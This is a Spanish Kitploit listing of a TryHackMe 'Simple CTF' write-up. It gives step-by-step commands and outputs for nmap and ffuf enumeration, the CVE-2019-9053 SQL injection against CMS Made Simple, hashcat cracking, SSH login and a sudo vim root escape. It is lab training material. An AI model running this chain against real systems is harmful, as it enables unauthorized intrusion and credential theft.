Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Simple-CTF-Writeup — Tutorial profesional del CTF Simple de TryHackMe que cubre enumeración, inyección SQL en CMS Made Simple (CVE-2019-9053), recuperación de credenciales, acceso SSH, escalada de privilegios mediante Vim y compromiso de root. | Kitploit
Herramientas/GitHubGitHub/imperialx1104/simple-ctf-writeup
Descifrado de ContraseñasEscalada de PrivilegiosReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebCTFPruebas de PenetraciónAprendizaje y Educación

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHubimperialx1104/simple-ctf-writeup

Simple-CTF-Writeup

Tutorial profesional del CTF Simple de TryHackMe que cubre enumeración, inyección SQL en CMS Made Simple (CVE-2019-9053), recuperación de credenciales, acceso SSH, escalada de privilegios mediante Vim y compromiso de root.

Ver Repositorio
hace 2 mesesAún no revisado

Simple-CTF-Writeup

Guía profesional del laboratorio Simple CTF de TryHackMe que cubre enumeración, inyección SQL en CMS Made Simple (CVE-2019-9053), recuperación de credenciales, acceso por SSH, escalada de privilegios mediante Vim y compromiso total del sistema root.

TryHackMe - Writeup de Simple CTF

Una guía completa del laboratorio Simple CTF en TryHackMe, que cubre reconocimiento, enumeración, explotación, recuperación de credenciales, escalada de privilegios y captura de banderas.


Información del Laboratorio

CampoValor
PlataformaTryHackMe
NombreSimple CTF
DificultadFácil
CategoríaExplotación Web y Escalada de Privilegios en Linux
AutorSaahil Gupta (ImperialX1104)

Objetivo

El objetivo de este laboratorio es:

  • Enumerar la máquina objetivo
  • Descubrir servicios y aplicaciones ocultos
  • Explotar un CMS vulnerable
  • Recuperar credenciales
  • Obtener acceso por SSH
  • Escalar privilegios a root
  • Capturar ambas banderas

Resumen del Ataque

root@kitploit:~
Descubrimiento del Host
      │
      ▼
Enumeración de Puertos
      │
      ▼
Enumeración de Directorios
      │
      ▼
Descubrimiento del CMS
      │
      ▼
Identificación de Versión
      │
      ▼
Inyección SQL (CVE-2019-9053)
      │
      ▼
Extracción de Credenciales
      │
      ▼
Fuerza Bruta de Contraseñas
      │
      ▼
Acceso por SSH
      │
      ▼
Bandera de Usuario
      │
      ▼
Escalada de Privilegios
      │
      ▼
Bandera de Root

Reconocimiento

Descubrimiento del Host

El primer paso fue verificar la conectividad con la máquina objetivo.

Comando

root@kitploit:~
ping 10.49.175.174

Resultado

El host respondió correctamente, confirmando que era accesible.

Captura de Pantalla

Ping Scan


Enumeración de Puertos

Se realizó un escaneo exhaustivo con Nmap para identificar los servicios expuestos.

Comando

root@kitploit:~
nmap -A -v 10.49.175.174

Resultados

PuertoServicioVersión
21FTPvsftpd 3.0.3
80HTTPApache 2.4.18
2222SSHOpenSSH 7.2p2

Hallazgos Destacados

  • Inicio de sesión anónimo por FTP habilitado
  • Servidor web Apache en ejecución
  • SSH expuesto en el puerto 2222
  • Archivo robots.txt descubierto

Captura de Pantalla

Nmap Enumeration


Enumeración Web

Al navegar al servidor web objetivo se mostró la página de inicio predeterminada de Apache.

URL

root@kitploit:~
http://10.49.175.174

Captura de Pantalla

Apache Default Page

En esta etapa no era visible ninguna superficie de ataque obvia.


Enumeración de Directorios

Para identificar recursos ocultos, se realizó fuerza bruta de directorios con FFUF.

Comando

root@kitploit:~
ffuf -u http://10.49.175.174/FUZZ \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt \
-fc 200

Resultados

root@kitploit:~
simple [Status: 301]

Captura de Pantalla

FFUF Enumeration

Se descubrió un directorio llamado /simple.


Descubrimiento del CMS

Al navegar al directorio descubierto se reveló una instalación de CMS.

URL

root@kitploit:~
http://10.49.175.174/simple

Captura de Pantalla

CMS Made Simple

CMS Identificado

root@kitploit:~
CMS Made Simple 2.2.8

El número de versión resultaría crítico más adelante.


Investigación de Vulnerabilidades

La versión del CMS se investigó con SearchSploit.

Comando

root@kitploit:~
searchsploit "CMS Made Simple"

Resultado

root@kitploit:~
CMS Made Simple < 2.2.10 - SQL Injection

Captura de Pantalla

SearchSploit Results

Se identificó una vulnerabilidad conocida de inyección SQL.


Obtención del Exploit

El exploit se copió localmente para su análisis y ejecución.

Comando

root@kitploit:~
searchsploit -m 46635

Salida

root@kitploit:~
CMS Made Simple < 2.2.10 - SQL Injection
CVE-2019-9053

Captura de Pantalla

Exploit Download


Explotación

El exploit disponible públicamente se ejecutó contra la instancia del CMS objetivo.

Comando

root@kitploit:~
python3 exploit.py \
-u http://10.49.175.174/simple/ \
--crack \
-w /usr/share/wordlists/rockyou.txt

Extracción de Credenciales

El exploit extrajo exitosamente información de la base de datos del backend.

Salida

root@kitploit:~
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: [email protected]

Captura de Pantalla

Credential Extraction

Información Recuperada

ElementoValor
Usuariomitch
Email[email protected]
Salt1dac0d92e9fa6bb2

Fuerza Bruta de Contraseñas

El hash extraído se crackeó con Hashcat.

Comando

root@kitploit:~
hashcat -m 20 hash.txt --show

Salida

root@kitploit:~
0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2:secret

Credenciales Recuperadas

CampoValor
Usuariomitch
Contraseñasecret

Captura de Pantalla

Hashcat Password Recovery


Acceso Inicial

Las credenciales recuperadas se probaron contra el servicio SSH.

Comando

root@kitploit:~
ssh [email protected] -p 2222

Contraseña

root@kitploit:~
secret

Resultado

root@kitploit:~
Welcome to Ubuntu 16.04.6 LTS

Captura de Pantalla

SSH Access

La autenticación exitosa proporcionó acceso a la shell como usuario mitch.


Bandera de Usuario

Después de obtener acceso, la bandera de usuario se localizó en el directorio personal de Mitch.

Comandos

root@kitploit:~
whoami
cd ~
cat user.txt

Salida

root@kitploit:~
G00d j0b, keep up!

Captura de Pantalla

User Flag


Escalada de Privilegios

Enumeración de Sudo

Al verificar los permisos de sudo se reveló una configuración interesante.

Comando

root@kitploit:~
sudo -l

Salida

root@kitploit:~
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim

Captura de Pantalla

sudo -l Output

Esta configuración permite al usuario ejecutar Vim con privilegios de root sin proporcionar una contraseña.


Acceso como Root

Ejecutando Vim como root:

root@kitploit:~
sudo vim

Debido a que Vim se ejecutaba con privilegios elevados, podía usarse para acceder a archivos propiedad de root.

Captura de Pantalla

Root Access via Vim


Bandera de Root

La bandera de root se localizó en el directorio del usuario root.

Comando

root@kitploit:~
:! cat /root/root.txt

Salida

root@kitploit:~
W3ll d0n3. You made it!

Captura de Pantalla

Root Flag


Banderas Capturadas

Bandera de Usuario

root@kitploit:~
G00d j0b, keep up!

Bandera de Root

root@kitploit:~
W3ll d0n3. You made it!

Resumen de la Cadena de Ataque

root@kitploit:~
Escaneo con Nmap
    ↓
Enumeración Web
    ↓
Descubrimiento de Directorios (/simple)
    ↓
CMS Made Simple 2.2.8
    ↓
Investigación con SearchSploit
    ↓
Inyección SQL CVE-2019-9053
    ↓
Extracción de Credenciales
    ↓
Fuerza Bruta del Hash
    ↓
Inicio de Sesión SSH (mitch:secret)
    ↓
Bandera de Usuario
    ↓
sudo -l
    ↓
Escalada de Privilegios con Vim
    ↓
Bandera de Root

Lecciones Aprendidas

La Enumeración Importa

El CMS vulnerable no era visible en la página principal y requirió enumeración de directorios para descubrirlo.

La Identificación de Versiones Es Crítica

Conocer la versión exacta del CMS condujo directamente a una vulnerabilidad conocida.

Reutilización de Credenciales

Las credenciales recuperadas siempre deben probarse contra todos los servicios disponibles.

Las Malas Configuraciones de Sudo Son Peligrosas

Permitir la ejecución privilegiada de editores como Vim puede conducir al compromiso total del sistema.


Herramientas Utilizadas

  • Nmap
  • FFUF
  • SearchSploit
  • Python
  • Hashcat
  • SSH
  • Vim

Conclusión

Este laboratorio demostró una cadena de ataque completa, desde la enumeración inicial hasta el compromiso total del sistema root. Al combinar enumeración de aplicaciones web, explotación de inyección SQL, fuerza bruta de contraseñas y técnicas de escalada de privilegios en Linux, se logró el control total del sistema objetivo.

El laboratorio sirve como una excelente introducción a la metodología real de pruebas de penetración y resalta la importancia de aplicar parches de software adecuados, la seguridad de las credenciales y los controles de acceso de mínimo privilegio.


Autor

Saahil Gupta (ImperialX1104)

  • GitHub: https://github.com/ImperialX1104
  • TryHackMe: ImperialX

⭐ Si te resultó útil este writeup, considera dar una estrella al repositorio y conectar conmigo en GitHub.

Descargar herramienta